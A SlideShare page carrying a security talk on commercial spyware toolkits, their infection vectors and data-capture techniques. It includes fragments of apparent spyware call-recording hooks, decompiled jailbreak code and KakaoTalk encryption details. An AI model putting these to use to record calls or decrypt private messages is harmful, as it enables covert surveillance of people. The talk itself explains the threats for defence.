Light talk @ coscup 2011 : Incremental Global Prelink for AndroidLight talk @ coscup 2011 : Incremental Global Prelink for Android
Light talk @ coscup 2011 : Incremental Global Prelink for Android
 
Game Engine
Game EngineGame Engine
Game Engine
 
Shellcoding, an Introduction
Shellcoding, an IntroductionShellcoding, an Introduction
Shellcoding, an Introduction
 
Function Call Stack
Function Call StackFunction Call Stack
Function Call Stack
 
Buffer overflow explained
Buffer overflow explainedBuffer overflow explained
Buffer overflow explained
 
Rethinking the debugger
Rethinking the debuggerRethinking the debugger
Rethinking the debugger
 
Exception handling poirting in gcc
Exception handling poirting in gccException handling poirting in gcc
Exception handling poirting in gcc
 
Programmazione Genetica per l'Inferenza di Reti di Kauffman
Programmazione Genetica per l'Inferenza di Reti di KauffmanProgrammazione Genetica per l'Inferenza di Reti di Kauffman
Programmazione Genetica per l'Inferenza di Reti di Kauffman
 
Program activation records
Program activation recordsProgram activation records
Program activation records
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
 
Buffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh SharmaBuffer Overflow Demo by Saurabh Sharma
Buffer Overflow Demo by Saurabh Sharma
 
FuelPHP
FuelPHPFuelPHP
FuelPHP
 
Ceh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflowCeh v5 module 20 buffer overflow
Ceh v5 module 20 buffer overflow
 
ARM procedure calling conventions and recursion
ARM procedure calling conventions and recursionARM procedure calling conventions and recursion
ARM procedure calling conventions and recursion
 
Android C Library: Bionic 成長計畫
Android C Library: Bionic 成長計畫Android C Library: Bionic 成長計畫
Android C Library: Bionic 成長計畫
 

Similar to A Stealthy Stealers - Spyware Toolkit and What They Do

Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)
Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)
Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)Gavin Guo
 
Browsers with Wings
Browsers with WingsBrowsers with Wings
Browsers with WingsRemy Sharp
 
Flashback, el primer malware masivo de sistemas Mac
Flashback, el primer malware masivo de sistemas MacFlashback, el primer malware masivo de sistemas Mac
Flashback, el primer malware masivo de sistemas MacESET Latinoamérica
 
Technical Report Vawtrak v2
Technical Report Vawtrak v2Technical Report Vawtrak v2
Technical Report Vawtrak v2Blueliv
 
Arduino、Web 到 IoT
Arduino、Web 到 IoTArduino、Web 到 IoT
Arduino、Web 到 IoTJustin Lin
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016Mikhail Sosonkin
 
DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...
DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...
DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...Felipe Prado
 
OOP for Hardware Verification--Demystified!
OOP for Hardware Verification--Demystified! OOP for Hardware Verification--Demystified!
OOP for Hardware Verification--Demystified! DVClub
 
Virus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperVirus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperSynack
 
Keep it simple web development stack
Keep it simple web development stackKeep it simple web development stack
Keep it simple web development stackEric Ahn
 
WebRTC 101 - How to get started building your first WebRTC application
WebRTC 101 - How to get started building your first WebRTC applicationWebRTC 101 - How to get started building your first WebRTC application
WebRTC 101 - How to get started building your first WebRTC applicationDan Jenkins
 
Is HTML5 Ready? (workshop)
Is HTML5 Ready? (workshop)Is HTML5 Ready? (workshop)
Is HTML5 Ready? (workshop)Remy Sharp
 
Is html5-ready-workshop-110727181512-phpapp02
Is html5-ready-workshop-110727181512-phpapp02Is html5-ready-workshop-110727181512-phpapp02
Is html5-ready-workshop-110727181512-phpapp02PL dream
 
Let’s talk about microbenchmarking
Let’s talk about microbenchmarkingLet’s talk about microbenchmarking
Let’s talk about microbenchmarkingAndrey Akinshin
 
Pebble Watch iOS SDK Overview
Pebble Watch iOS SDK OverviewPebble Watch iOS SDK Overview
Pebble Watch iOS SDK OverviewMatthew Morey
 
ISCA Final Presentaiton - Compilations
ISCA Final Presentaiton - CompilationsISCA Final Presentaiton - Compilations
ISCA Final Presentaiton - CompilationsHSA Foundation
 

Similar to A Stealthy Stealers - Spyware Toolkit and What They Do (20)

Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)
Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)
Spectre(v1%2 fv2%2fv4) v.s. meltdown(v3)
 
Mintz q207
Mintz q207Mintz q207
Mintz q207
 
Browsers with Wings
Browsers with WingsBrowsers with Wings
Browsers with Wings
 
Flashback, el primer malware masivo de sistemas Mac
Flashback, el primer malware masivo de sistemas MacFlashback, el primer malware masivo de sistemas Mac
Flashback, el primer malware masivo de sistemas Mac
 
Technical Report Vawtrak v2
Technical Report Vawtrak v2Technical Report Vawtrak v2
Technical Report Vawtrak v2
 
Arduino、Web 到 IoT
Arduino、Web 到 IoTArduino、Web 到 IoT
Arduino、Web 到 IoT
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016
 
DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...
DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...
DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...
 
OOP for Hardware Verification--Demystified!
OOP for Hardware Verification--Demystified! OOP for Hardware Verification--Demystified!
OOP for Hardware Verification--Demystified!
 
Virus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperVirus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing Gatekeeper
 
Marat-Slides
Marat-SlidesMarat-Slides
Marat-Slides
 
3
33
3
 
Keep it simple web development stack
Keep it simple web development stackKeep it simple web development stack
Keep it simple web development stack
 
WebRTC 101 - How to get started building your first WebRTC application
WebRTC 101 - How to get started building your first WebRTC applicationWebRTC 101 - How to get started building your first WebRTC application
WebRTC 101 - How to get started building your first WebRTC application
 
Is HTML5 Ready? (workshop)
Is HTML5 Ready? (workshop)Is HTML5 Ready? (workshop)
Is HTML5 Ready? (workshop)
 
Is html5-ready-workshop-110727181512-phpapp02
Is html5-ready-workshop-110727181512-phpapp02Is html5-ready-workshop-110727181512-phpapp02
Is html5-ready-workshop-110727181512-phpapp02
 
Let’s talk about microbenchmarking
Let’s talk about microbenchmarkingLet’s talk about microbenchmarking
Let’s talk about microbenchmarking
 
dotCloud and go
dotCloud and godotCloud and go
dotCloud and go
 
Pebble Watch iOS SDK Overview
Pebble Watch iOS SDK OverviewPebble Watch iOS SDK Overview
Pebble Watch iOS SDK Overview
 
ISCA Final Presentaiton - Compilations
ISCA Final Presentaiton - CompilationsISCA Final Presentaiton - Compilations
ISCA Final Presentaiton - Compilations
 

Recently uploaded

Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 

Recently uploaded (20)

Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 

A Stealthy Stealers - Spyware Toolkit and What They Do

  • 1. A Stealthy Information Stealers They know the things that we can’t help with Documented by Ahn Sanghwan(h2spice@gmail.com)
  • 2. 2 AgendaAgenda I. Stealthy Stealers
 II. Infection Vectors
 III. Capture Sensitive Data
 IV. Conclusion

  • 3. Stealthy Stealer 3 They want to look through our eyes.
  • 4. Stealthy Stealer 4 The Web is moving to HTTPS. Encryption is increasingly more common. They want to look through our eyes.
  • 5. Stealthy Stealer 5 They are looking for a Solution They want to look through our eyes.
  • 6. Stealthy Stealer 6 They Hack the target, overcome encryption and capture relevant data They want to look through our eyes.
  • 8. Stealthy Stealer 8 FinSpy There are many commercial spyware toolkits for Intelligence Agency
  • 9. 9 Stealthy Stealer Many Country bought spyware toolkits
  • 10. 10 Stealthy Stealer • FinFisher(FinSpy) Customers : 32
 Canada, Mexico, Panama, United States, Australia, Bangladesh, Brunei, India, Indonesia, Japan, Malaysia, Mongolia, Pakistan, Turkmenistan, Vietnam, Singapore, Ethiopia, Nigeria, South Africa, Austria, Bulgaria, Latvia, Lithuania, Macedonia, Netherlands, Romania, Serbia, United Kingdom, Bahrain, Turkey, Qatar, United Arab Emirates • Hacking Team(Da vinci, Galileo) : 36
 Brasil, Lebanon, Bahrein, Poland, Colombia, Azerbaijan, Honduras, Cyprus, Turkey, Nigeria, Russia, Thailand, Switzerland, South Korea ,Oman, Ecuador, Spain, Vietnam, Mongolia, Czech Rep, Luxemburg, Egypt, Ethiopia, Panama, Uzbekistan, Singapore, Sudan, Kazakistan, United States, United Arab Emirates, Malaysia, Hungary, Chile, Saudi, Morocco, Italy, Mexico There are many commercial spyware toolkits for Intelligence Agency
  • 11. Stealthy Stealer There are many commercial spyware toolkits for Public
  • 12. Stealthy Stealer 12 They make almost all platforms on target
  • 15. 15 In Local • Bootable CD/DVD/USB • Bad-USB • Customized Jail-Breaking or Rooting Tools for mobile devices Infection Vectors https://youtu.be/oNsXKPHBR3s?t=4m32s
  • 16. 16 with Bootable CD/DVD/USB or BAD-USB Infection Vectors https://youtu.be/oNsXKPHBR3s?t=6m8s
  • 17. 17 with Customised Jail-breaking(or Rooting Tools) for mobile devices Infection Vectors
  • 18. 18 with Customised Jail-breaking or Rooting Tools for mobile devices Infection Vectors if ( !sub_100020990(v4, off_102502328) ) afc_make_directory((__int64)v4, off_102502328); v1 = sub_100021000(off_102502328, "Cydia.tar"); sub_100020AE0(v4, v1); if ( sub_1000208E0(v4, v1, *(_QWORD *)(*(_QWORD *)(a1 + 8) + 128LL), *(_DWORD *)(*(_QWORD *)(a1 + 8) + 136LL)) ) { free(v1); usleep(0x7A120u); v1 = sub_100021000(off_102502328, "pangu.tar"); sub_100020AE0(v4, v1); if ( sub_1000208E0(v4, v1, *(_QWORD *)(*(_QWORD *)(a1 + 8) + 144LL), *(_DWORD *)(*(_QWORD *)(a1 + 8) + 152LL)) ) { free(v1); usleep(0x7A120u); v1 = sub_100021000(off_102502328, "pangu_ex.tar"); sub_100020AE0(v4, v1); if ( sub_1000208E0(v4, v1, *(_QWORD *)(*(_QWORD *)(a1 + 8) + 160LL), *(_DWORD *)(*(_QWORD *)(a1 + 8) + 168LL)) ) { free(v1); usleep(0x7A120u); v1 = sub_100021000(off_102502328, "packagelist.tar"); sub_100020AE0(v4, v1); if ( sub_1000208E0(v4, v1, *(_QWORD *)(*(_QWORD *)(a1 + 8) + 192LL), *(_DWORD *)(*(_QWORD *)(a1 + 8) + 200LL)) ) { free(v1); usleep(0x7A120u); v2 = 1; v1 = 0LL; if ( *(_BYTE *)(*(_QWORD *)(a1 + 8) + 1264LL) ) { v1 = sub_100021000(off_102502328, "helper.tar");
  • 19. 19 Mactans (BlackHat 2013) Infection Vectors • Injecting Malware into iOS Devices via Malicious Charger • Yeongjin Jang, Billy Lau, Chengyu Song, Georgia Institute of Technology
  • 20. 20 In Remote • Sending Executable or Document file • Sending Link or QRCode included malware
 • Modifying network traffic on the fly 
 (acting on data downloaded from target’s device) • Replace URL resource • Inject-EXE • Inject-HTML-Flash (0-day vulnerabilities) Infection Vectors
  • 21. 21 In Remote • Sending Executable or Document file • Sending Link or QRCode included malware
 • Modifying network traffic on the fly 
 (acting on data downloaded from target’s device) • Replace URL resource • Inject-EXE • Inject-HTML-Flash (0-day vulnerabilities) Infection Vectors
  • 22. 22 In Remote • Sending Executable or Document file • Sending Link or QRCode included malware
 • Modifying network traffic on the fly 
 (acting on data downloaded from target’s device) • Replace URL resource • Inject-EXE • Inject-HTML-Flash (0-day vulnerabilities) Infection Vectors
  • 23. 23 In Remote • Sending Executable or Document file • Sending Link or QRCode included malware
 • Modifying network traffic on the fly 
 (acting on data downloaded from target’s device) • Replace URL resource • Inject-EXE • Inject-HTML-Flash (0-day vulnerabilities) Infection Vectors
  • 24. 24 In Remote - Network Injection Infection Vectors https://youtu.be/BXTyxAsYk3w?t=12s
  • 25. Capture Sensitive Data 25 Sensitive Data that stealer can capture. Money Call Message Password Contacts Location MIC E-Mail Camera KeyLog Clipboard Web HistoryFile Screenshot
  • 26. Capture Sensitive Data 26 Android Call & MIC • Audio Unit Hooking by Dynamic Binary Instrumentation(DBI)
 HOOK
  • 27. 27 void* setStreamVolume_h(void* a, void* b, void* c, void* d, voi void* o, void* p, void* q, void* r, void* s, void* t, void* u, void* void* newTrack_h(void* a, void* b, void* c, void* d, void* e, voi void* p, void* q, void* r, void* s, void* t, void* u, void* w) ; void* startTrack_h(void* a, void* b, void* c, void* d, void* e, void* p, void* q, void* r, void* s, void* t, void* u, void* w) ; void* stopTrack_h(void* a, void* b, void* c, void* d, void* e, vo void* p, void* q, void* r, void* s, void* t, void* u, void* w) ; void* threadLoop_h(void* a, void* b, void* c, void* d, void* e, void* p, void* q, void* r, void* s, void* t, void* u, void* w) ; void* audioFlingerC1_h(void* a, void* b, void* c, void* d, void void* o, void* p, void* q, void* r, void* s, void* t, void* u, void* void* audioFlingerC2_h(void* a, void* b, void* c, void* d, void void* o, void* p, void* q, void* r, void* s, void* t, void* u, void* void* getBuffer_h(void* a, void* b, void* c, void* d, void* e, vo void* p, void* q, void* r, void* s, void* t, void* u, void* w) ; void* stepUser_h(void* a, void* b, void* c, void* d, void* e, voi void* p, void* q, void* r, void* s, void* t, void* u, void* w) ; void* stepServer_h(void* a, void* b, void* c, void* d, void* e, void* p, void* q, void* r, void* s, void* t, void* u, void* w) ; void* recordTrack_getNextBuffer_h(void* a, void* b, void* c, void* n, void* o, void* p, void* q, void* r, void* s, void* t, void* void* recordTrack_getNextBuffer2_h(void* a, void* b, void* c m, void* n, void* o, void* p, void* q, void* r, void* s, void* t, vo void* playbackTrack_getNextBuffer_h(void* a, void* b, void* m, void* n, void* o, void* p, void* q, void* r, void* s, void* t, vo void* playbackTrack_getNextBuffer2_h(void* a, void* b, void* void* m, void* n, void* o, void* p, void* q, void* r, void* s, void* void* playbackTrack_getNextBuffer3_h(void* a, void* b, void* void* m, void* n, void* o, void* p, void* q, void* r, void* s, void* void* recordThread_getNextBuffer_h(void* a, void* b, void* c m, void* n, void* o, void* p, void* q, void* r, void* s, void* t, vo void* playbackTimedTrack_getNextBuffer_h(void* a, void* b, void* m, void* n, void* o, void* p, void* q, void* r, void* s, void* void* newRecordTrack_h(void* a, void* b, void* c, void* d, void void* o, void* p, void* q, void* r, void* s, void* t, void* u, void* void* recordTrackStart_h(void* a, void* b, void* c, void* d, vo void* o, void* p, void* q, void* r, void* s, void* t, void* u, void* void* playbackTrackStart_h(void* a, void* b, void* c, void* d, void* o, void* p, void* q, void* r, void* s, void* t, void* u, void* void* recordTrackStop_h(void* a, void* b, void* c, void* d, voi
  • 28. 28 record2 if( cblk_tmp == NULL ) { #ifdef DBG log("uthash shit happenedn"); #endif return result; } #ifdef DBG log("ttadded cblk from within getNextBuffern"); #endif } // otherwise dump from cblkb_tmp: buffer->raw [1] to buffer->frameCount [2] * frameSize [3] // and update cblk_tmp else { if( result == 0 && cblk_tmp->lastFrameCount != 0 ) { // aka NO_ERROR and cblk_tmp-last* contains valid pointers (see goto getNextBuffer_exit) // header headerStart = lseek(fd_in, 0, SEEK_CUR); #ifdef DBG log("ttheaderStart: %xn", headerStart); #endif uintTmp = 0xdeaddead; write(fd_in, &uintTmp, 4); // 1] cblk write(fd_in, &uintTmp, 4); // 2] timestamp write(fd_in, &uintTmp, 4); // 3] timestamp write(fd_in, &uintTmp, 4); // 4] streamType write(fd_in, &uintTmp, 4); // 5] sampleRate write(fd_in, &uintTmp, 4); // 6] size of block #ifdef DBG log("tttbuffer spans: %p -> %pn", cblk_tmp->lastBufferRaw, (cblk_tmp->lastBufferRaw + cblk_tmp->lastFrameCount * cblk_tmp->lastFrameSize ) ); #endif res = write(fd_in, cblk_tmp->lastBufferRaw, cblk_tmp->lastFrameCount * cblk_tmp->lastFrameSize); #ifdef DBG log("ttttwrote: %d - expected: %dn", res, cblk_tmp->lastFrameCount * cblk_tmp->lastFrameSize ); #endif positionTmp = lseek(fd_in, 0, SEEK_CUR); #ifdef DBG log("ttfake header written: %xn", positionTmp); #endif // Dumping Audio Buffer
  • 29. Capture Sensitive Data 29 iOS Call & MIC • Audio Unit Hooking by Substrate
  • 30. Capture Sensitive Data 30 iOS Call & Voice • Audio Unit Hooking by Substrate micBuffer.mBuffers[0].mDataByteSize = sampleSize * bufferSizeInSamples; micBuffer.mBuffers[0].mData = malloc(micBuffer.mBuffers[0].mDataByteSize); AudioBufferList speakerBuffer; speakerBuffer.mNumberBuffers = 1; speakerBuffer.mBuffers[0].mNumberChannels = 1; speakerBuffer.mBuffers[0].mDataByteSize = sampleSize * bufferSizeInSamples; speakerBuffer.mBuffers[0].mData = malloc(speakerBuffer.mBuffers[0].mDataByteSize); AudioBufferList mixBuffer; mixBuffer.mNumberBuffers = 1; mixBuffer.mBuffers[0].mNumberChannels = 2; mixBuffer.mBuffers[0].mDataByteSize = sampleSize * bufferSizeInSamples * 2; mixBuffer.mBuffers[0].mData = malloc(mixBuffer.mBuffers[0].mDataByteSize); //Converting while (true) { //Reading data from input files UInt32 framesToRead = bufferSizeInSamples; ExtAudioFileRead(micFile, &framesToRead, &micBuffer); ExtAudioFileRead(speakerFile, &framesToRead, &speakerBuffer); if (framesToRead == 0) { break; } //Building interleaved stereo buffer - left channel is mic, right - speaker for (int i = 0; i < framesToRead; i++) { memcpy((char*)mixBuffer.mBuffers[0].mData + i * sampleSize * 2, (char*)micBuffer.mBuffers[0].mData + i * sampleSize, sampleSize); memcpy((char*)mixBuffer.mBuffers[0].mData + i * sampleSize * 2 + sampleSize, (char*)speakerBuffer.mBuffers[0].mData + i * sampleSize, sampleSize); } //Writing to output file - LPCM will be converted to AAC ExtAudioFileWrite(mixFile, framesToRead, &mixBuffer); } //Closing files // Dumping Audio Buffer
  • 31. Capture Sensitive Data 31 Capture Message & Another data • Stored message as file (.db .sqlite .xml or etc) • Plain-Text • Encrypted Message • need a Decryption (usually, Key stored in the local storage)
  • 32. Capture Sensitive Data 32 Encrypted Message - case of Kakao Talk • AES 256 CBC Encryption • Generate a Encryption-Key base on UserId • IVKey is static (1608096f02172b0821210a1003030706)

  • 33. Capture Sensitive Data 33 Deleted Message Recovery • Before Deleting • After Deleting
  • 34. Capture Sensitive Data 34 Capture Message via Window • Accessibility • Special Permission for Accessibility 

  • 35. Capture Sensitive Data 35 • Accessibility • Special Permission for Accessibility 
 Capture Message via Window
  • 36. Capture Sensitive Data 36 Messages or another datas • Stored message as file (.db .sqlite .xml or etc) • plain-text • encrypted message • need a decryption (usually, encryption-key store in the local storage) • special permission , accessibility • SMS, BLIND
  • 37. 37
  • 38. 38
  • 39. Capture Sensitive Data 39 Authentication Bruteforce Attack • Using information collected from another website hacked
  • 40. Conclusion 40 We still confront security holes that we hardly control or even can not • Injection issue on the Network Level : File Reputation Services : VPN
 • Encrypt issue : Trusted Platform Module - Encrypt/Decrypt sensitive data using the secure world • Authentication Bruteforce Attack : 2 Channel Authentication
  • 41. Q / A